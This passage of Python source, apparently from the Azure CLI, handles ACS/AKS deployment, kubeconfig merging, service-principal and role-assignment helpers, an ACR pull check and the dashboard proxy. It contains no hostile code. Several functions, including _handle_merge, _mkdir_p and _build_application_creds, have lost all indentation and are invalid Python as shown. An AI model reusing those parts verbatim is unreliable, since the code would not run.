            api_version = "2017-07-01"  # 2017-07-01 supported in the preview locations
        else:
            api_version = "2017-01-31"  # 2017-01-31 applied to other locations
    # Kubernetes requires a service principal; other orchestrators do not.
    if orchestrator_type.lower() == 'kubernetes':
        principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
                                                  dns_name_prefix, location, name)
        client_secret = principal_obj.get("client_secret")
        service_principal = principal_obj.get("service_principal")
    elif windows:
        raise CLIError('--windows is only supported for Kubernetes clusters')
    # set location if void
    if not location:
        location = '[resourceGroup().location]'
    # set os_type
    os_type = 'Linux'
    if windows:
        os_type = 'Windows'
    # set agent_ports if void
    if not agent_ports:
        agent_ports = []
    # get windows_profile
    windows_profile = _generate_windows_profile(
        windows, admin_username, admin_password)
    # The resources.properties fields should match with ContainerServices' api model
    master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
                                                        master_vm_size, master_osdisk_size, master_vnet_subnet_id,
                                                        master_first_consecutive_static_ip, master_storage_profile)
    agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                                        agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                                        agent_ports, agent_storage_profile)
    outputs = _generate_outputs(name, orchestrator_type, admin_username)
    properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
                                      agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
    # Assemble the single-resource ARM deployment template.
    resource = {
        "apiVersion": api_version,
        "location": location,
        "type": "Microsoft.ContainerService/containerServices",
        "name": name,
        "tags": tags,
        "properties": properties,
    }
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "resources": [
            resource,
        ],
        "outputs": outputs,
    }
    params = {}
    if service_principal is not None and client_secret is not None:
        # Pass the client secret as a secureString template parameter rather
        # than embedding it in the template body.
        properties["servicePrincipalProfile"] = {
            "clientId": service_principal,
            "secret": "[parameters('clientSecret')]",
        }
        template["parameters"] = {
            "clientSecret": {
                "type": "secureString",
                "metadata": {
                    "description": "The client secret for the service principal"
                }
            }
        }
        params = {
            "clientSecret": {
                "value": client_secret
            }
        }
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            return _invoke_deployment(cmd, resource_group_name, deployment_name,
                                      template, params, validate, no_wait)
        except CloudError as ex:
            retry_exception = ex
            if 'is not valid according to the validation procedure' in ex.message or \
               'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
               'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist service principal credentials for *subscription_id* in the CLI config dir."""
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal
    config_path = os.path.join(get_config_dir(), file_name)
    full_config = load_service_principals(config_path=config_path) or {}
    full_config[subscription_id] = entry
    # Create/truncate with owner-only permissions: the file holds a secret.
    fd = os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w+') as sp_file:
        json.dump(full_config, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service principal entry for *subscription_id*, or None."""
    config_path = os.path.join(get_config_dir(), file_name)
    config = load_service_principals(config_path)
    return config.get(subscription_id) if config else None
def load_service_principals(config_path):
    """Best-effort read of the service principal config file.

    Returns the parsed dict, or None when the file is missing or unparsable
    (deliberately swallows all parse errors -- callers treat None as 'empty').
    """
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as config_file:
            return shell_safe_json_parse(config_file.read())
    except:  # pylint: disable=bare-except
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Validate or start an ARM deployment of *template* into the resource group.

    :param validate: when truthy, only validate the template (no deployment)
    :param no_wait: start the deployment without waiting for completion
    :param subscription_id: deploy into a different subscription when set
    :returns: validation result when *validate*, otherwise a poller/result
        from begin_create_or_update (subject to *no_wait*)
    """
    DeploymentProperties = cmd.get_models(
        'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(
        template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    Deployment = cmd.get_models(
        'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    deployment = Deployment(properties=properties)
    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')
        # Newer API versions expose validation as a long-running operation.
        if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
            validation_poller = smc.begin_validate(
                resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return smc.validate(resource_group_name, deployment_name, deployment)
    return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        ssh_key_file=None,
                        overwrite_existing=False):
    """Download and install kubectl credentials from the cluster master
    :param name: The name of the cluster.
    :type name: str
    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param path: Where to install the kubectl config file
    :type path: str
    :param ssh_key_file: Path to an SSH key file to use
    :type ssh_key_file: str
    :param overwrite_existing: Overwrite conflicting entries in an existing
        kubeconfig instead of prompting
    :type overwrite_existing: bool
    """
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_get_credentials_internal(
        name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
    """Copy the cluster's kubeconfig over SSH and merge it into the local config.

    The remote file is first copied to a unique sibling path; if that differs
    from *path* the two configs are merged (prompting on conflicts unless
    *overwrite_existing*).

    :raises CLIError: when the provided ssh key file does not exist
    """
    if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
        raise CLIError(
            'Private key file {} does not exist'.format(ssh_key_file))
    dns_prefix = acs_info.master_profile.dns_prefix  # pylint: disable=no-member
    location = acs_info.location  # pylint: disable=no-member
    user = acs_info.linux_profile.admin_username  # pylint: disable=no-member
    _mkdir_p(os.path.dirname(path))
    # Find a destination path that does not already exist so we never clobber
    # the user's current kubeconfig directly.
    path_candidate = path
    ix = 0
    while os.path.exists(path_candidate):
        ix += 1
        path_candidate = '{}-{}-{}'.format(path, name, ix)
    # TODO: this only works for public cloud, need other casing for national clouds
    acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
                           '.kube/config', path_candidate, key_filename=ssh_key_file)
    # merge things
    if path_candidate != path:
        try:
            merge_kubernetes_configurations(
                path, path_candidate, overwrite_existing)
        except yaml.YAMLError as exc:
            # Best-effort merge: leave the downloaded copy in place and tell
            # the user where it is.
            logger.warning(
                'Failed to merge credentials to kube config file: %s', exc)
            logger.warning(
                'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Parse *filename* as a YAML kubeconfig.

    :raises CLIError: when the file does not exist or cannot be parsed
    """
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) != errno.ENOENT:
            raise
        raise CLIError('{} does not exist'.format(filename))
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in *addition_file* into *existing_file*.

    :param existing_file: path to the kubeconfig being merged into (rewritten).
    :param addition_file: path to the kubeconfig supplying new entries.
    :param replace: overwrite conflicting entries without prompting.
    :param context_name: optional name to rename the added context/cluster to.
    :raises CLIError: the addition file cannot be loaded or parses to nothing.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)

    # Validate before touching the parsed data: an empty YAML document loads
    # as None, and the subscript operations below would raise a TypeError
    # instead of this intended error.
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))

    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name

    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue

    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']

    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(
            stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)

    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)

    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(
        current_context, existing_file)
    logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
    """Fetch the ContainerService object from the Azure REST API.

    :param name: ACS resource name
    :type name: String
    :param resource_group_name: Resource group name
    :type resource_group_name: String
    """
    services_client = cf_container_services(cli_ctx, None)
    return services_client.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
    """Scale the first agent pool of an ACS cluster to *new_agent_count*.

    :return: the poller returned by begin_create_or_update.
    """
    container_service = client.get(resource_group_name, container_service_name)
    container_service.agent_pool_profiles[0].count = new_agent_count  # pylint: disable=no-member
    # Clear the service principal for Kubernetes clusters, otherwise
    # server-side validation complains.
    if container_service.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
        container_service.service_principal_profile = None
    # Clear the windows profile so validation doesn't demand the admin password.
    container_service.windows_profile = None
    return client.begin_create_or_update(resource_group_name, container_service_name, container_service)
def list_container_services(cmd, client, resource_group_name=None):
    ''' List Container Services. '''
    # Scope to the resource group when one is given, otherwise list the
    # whole subscription.
    if resource_group_name:
        services = client.list_by_resource_group(resource_group_name=resource_group_name)
    else:
        services = client.list()
    return list(services)
def show_service_principal(client, identifier):
    """Resolve *identifier* to a service principal object id and fetch it."""
    return client.get(_resolve_service_principal(client, identifier))
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Register an AAD application.

    :return: a (application, session-key) pair; the session key comes from
        the 'ocp-aad-session-key' response header of the raw response.
    :raises CLIError: the signed-in user lacks directory write permission.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                         key_usage, start_date, end_date)
    create_params = ApplicationCreateParameters(
        available_to_other_tenants=available_to_other_tenants,
        display_name=display_name,
        identifier_uris=identifier_uris,
        homepage=homepage,
        reply_urls=reply_urls,
        key_credentials=key_creds,
        password_credentials=password_creds,
        required_resource_access=required_resource_accesses)
    try:
        result = client.create(create_params, raw=True)
    except GraphErrorException as ex:
        # Surface the common "missing directory permission" failure with a
        # pointer to the fix; re-raise anything else untouched.
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
    return result.output, result.response.headers["ocp-aad-session-key"]
def update_application(client, object_id, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Update credentials and reply URLs of an existing AAD application.

    Only credentials and reply URLs are patched here; the remaining
    parameters are accepted for signature parity but unused.
    :raises CLIError: the signed-in user lacks directory write permission.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                         key_usage, start_date, end_date)
    try:
        if key_creds:
            client.update_key_credentials(object_id, key_creds)
        if password_creds:
            client.update_password_credentials(object_id, password_creds)
        if reply_urls:
            client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
        return
    except GraphErrorException as ex:
        # Surface the common "missing directory permission" failure with a
        # pointer to the fix; re-raise anything else untouched.
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an AAD application.

    :param identifier: an appId GUID, an identifier URI, or (when lookup
        finds nothing) an application object id.
    :param resolve_app: resolve *identifier* to an appId first; when false
        it is used as the appId directly.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)

    if not resolve_app:
        app_id = identifier
    else:
        try:
            uuid.UUID(identifier)
            matches = list(rbac_client.applications.list(
                filter="appId eq '{}'".format(identifier)))
        except ValueError:
            matches = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not matches:  # assume we get an object id
            matches = [rbac_client.applications.get(identifier)]
        app_id = matches[0].app_id

    return rbac_client.service_principals.create(
        ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Assign *role* to *assignee* at the given scope.

    When *is_service_principal* is true the assignee is resolved through
    Graph to an object id first; otherwise it is used as an object id.
    """
    return _create_role_assignment(
        cli_ctx, role, assignee,
        resource_group_name=resource_group_name,
        scope=scope,
        resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment at *scope* (or resource group / subscription).

    :param role: role name or role definition GUID.
    :param assignee: service principal client id or MSI object id.
    :param resolve_assignee: resolve *assignee* through Graph to an object id.
    """
    from azure.cli.core.profiles import get_sdk
    auth_client = get_auth_management_client(cli_ctx, scope)
    assignments_client = auth_client.role_assignments
    definitions_client = auth_client.role_definitions

    scope = _build_role_scope(
        resource_group_name, scope, assignments_client.config.subscription_id)
    role_id = _resolve_role_id(role, scope, definitions_client)
    # A cluster with a service principal resolves the client id to an object
    # id; an MSI cluster already carries the object id.
    object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee

    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(
        role_definition_id=role_id, principal_id=object_id)
    assignment_name = uuid.uuid4()
    # TODO: track2/remove custom headers, depends on 'azure.mgmt.authorization'
    return assignments_client.create(scope, assignment_name, parameters, custom_headers=None)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, SPN, or object id) to a graph object id.

    Tries, in order: user principal name (when it contains '@'), service
    principal name, then a direct object-id stub lookup.
    :raises CLIError: nothing in the graph matches.
    """
    client = get_graph_rbac_management_client(cli_ctx)
    result = None
    if '@' in assignee:  # looks like a user principal name
        result = list(client.users.list(
            filter="userPrincipalName eq '{}'".format(assignee)))
    if not result:
        result = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not result:  # assume an object id, let us verify it
        result = _get_object_stubs(client, [assignee])

    # 2+ matches should never happen, so we only check 'no match' here
    if not result:
        raise CLIError(
            "No matches in graph database for '{}'".format(assignee))
    return result[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Look up directory object stubs for the given object ids."""
    query = GetObjectsParameters(include_directory_object_references=True,
                                 object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(query))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
    """Return True when a role assignment with the Network Contributor role
    definition id already exists exactly at *scope*."""
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"

    assignments_client = get_auth_management_client(cli_ctx, scope).role_assignments
    for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if assignment.scope == scope and assignment.role_definition_id.endswith(network_contributor_role_id):
            return True
    return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
    """Verify that the cluster's nodes can pull images from the given ACR.

    Downloads user credentials into a temporary kubeconfig, validates the
    kubectl client/server versions, then runs a one-shot diagnostic pod
    (CONST_CANIPULL_IMAGE) on the cluster that attempts the pull against
    *acr* and prints the pod's output.

    :param acr: name/login server of the Azure Container Registry to test.
    :raises ValidationError: kubectl is missing or its version is unreadable.
    :raises CLIError: the diagnostic pod run failed or produced no output.
    """
    if not which("kubectl"):
        raise ValidationError("Can not find kubectl executable in PATH")
    # Temporary kubeconfig holding non-admin credentials for this cluster.
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(
        cmd, client, resource_group_name, name, admin=False, path=browse_path
    )
    # Get kubectl minor version
    kubectl_minor_version = -1
    try:
        # NOTE(review): this rebinding shadows the 'cmd' parameter, which is
        # not used again after this point.
        cmd = f"kubectl version -o json --kubeconfig {browse_path}"
        output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
        jsonS, _ = output.communicate()
        kubectl_version = json.loads(jsonS)
        # Remove any non-numeric characters like + from minor version
        kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
        kubectl_server_minor_version = int(
            kubectl_version["serverVersion"]["minor"])
        kubectl_server_patch = int(
            kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
        # Warn about the known ACR-over-MSI issue on servers before 1.17.14.
        if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
            logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
                           'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for'
                           'more information.')
    except subprocess.CalledProcessError as err:
        raise ValidationError(
            "Could not find kubectl minor version: {}".format(err))
    if kubectl_minor_version == -1:
        raise ValidationError("Failed to get kubectl version")
    # Pod spec overrides: run as root on the host network and mount the
    # node's /etc/kubernetes (azure.json) and CA certificates read by the
    # canipull tool.
    podName = "canipull-" + str(uuid.uuid4())
    overrides = {
        "spec": {
            "restartPolicy": "Never",
            "hostNetwork": True,
            "containers": [
                {
                    "securityContext": {"runAsUser": 0},
                    "name": podName,
                    "image": CONST_CANIPULL_IMAGE,
                    "args": ["-v6", acr],
                    "stdin": True,
                    "stdinOnce": True,
                    "tty": True,
                    "volumeMounts": [
                        {"name": "azurejson", "mountPath": "/etc/kubernetes"},
                        {"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
                    ],
                }
            ],
            "tolerations": [
                {"key": "CriticalAddonsOnly", "operator": "Exists"},
                {"effect": "NoExecute", "operator": "Exists"},
            ],
            "volumes": [
                {"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
                {"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
            ],
            "nodeSelector": {"kubernetes.io/os": "linux"},
        }
    }
    try:
        # Run the diagnostic pod interactively and capture its output;
        # --rm deletes the pod when it exits.
        cmd = [
            "kubectl",
            "run",
            "--kubeconfig",
            browse_path,
            "--rm",
            "--quiet",
            "--image",
            CONST_CANIPULL_IMAGE,
            "--overrides",
            json.dumps(overrides),
            "-it",
            podName,
        ]
        # Support kubectl versons < 1.18
        if kubectl_minor_version < 18:
            cmd += ["--generator=run-pod/v1"]
        output = subprocess.check_output(
            cmd,
            universal_newlines=True,
        )
    except subprocess.CalledProcessError as err:
        raise CLIError("Failed to check the ACR: {}".format(err))
    if output:
        print(output)
        # Under pytest, also return the output so tests can assert on it.
        if os.getenv("PYTEST_CURRENT_TEST", None):
            return output
    else:
        raise CLIError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
    cmd,
    client,
    resource_group_name,
    name,
    disable_browser=False,
    listen_address="127.0.0.1",
    listen_port="8001",
    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
    """Open a browsable view of the cluster's workloads.

    For clusters on Kubernetes >= 1.19.0, or without the kube-dashboard
    addon enabled, opens the Azure portal resources view. Otherwise it
    locates the in-cluster dashboard pod and tunnels to it via
    ``kubectl proxy`` bound to *listen_address*:*listen_port*.

    :param disable_browser: don't open a browser tab; just log the URL.
    :param listen_address: local address for the kubectl proxy.
    :param listen_port: local port (as a string) for the kubectl proxy.
    :return: a status message used by tests, or None.
    :raises CLIError: kubectl missing, or the dashboard pod/port not found.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=resource_type,
                                                operation_group='managed_clusters')
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    return_msg = None
    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            # Azure Portal URL (https://portal.azure.com for public cloud)
            cmd.cli_ctx.cloud.endpoints.portal +
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning(
                'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)
        return_msg = "Kubernetes resources view on {}".format(dashboardURL)
        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return return_msg
    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    # Temporary kubeconfig with non-admin credentials for the kubectl calls.
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name,
                        name, admin=False, path=browse_path)
    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")
    # find the port
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))
    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'
    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    # kubectl-proxy URL addressing the dashboard service through the apiserver.
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post(
            'http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning(
            'To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)
    timeout = None
    # Under pytest, bound the proxy lifetime so the command returns.
    if os.getenv("PYTEST_CURRENT_TEST", None):
        timeout = 10
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async(dashboardURL)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
                                     listen_address, "--port", listen_port], stderr=subprocess.STDOUT, timeout=timeout)
        except subprocess.CalledProcessError as err:
            # NOTE(review): bytes.find() returns -1 (truthy) when the marker is
            # absent, so this fallback runs for nearly any proxy failure, not
            # only a missing '--address' flag — confirm intent.
            if err.output.find(b'unknown flag: --address'):
                return_msg = "Test Invalid Address! "
                if listen_address != '127.0.0.1':
                    logger.warning(
                        '"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning(
                        'The "--listen-address" argument will be ignored.')
                # Retry without --address for older kubectl versions.
                try:
                    subprocess.call(["kubectl", "--kubeconfig",
                                     browse_path, "proxy", "--port", listen_port], timeout=timeout)
                except subprocess.TimeoutExpired:
                    logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
                    return_msg = return_msg if return_msg else ""
                    return_msg += "Test Passed!"
        except subprocess.TimeoutExpired:
            logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
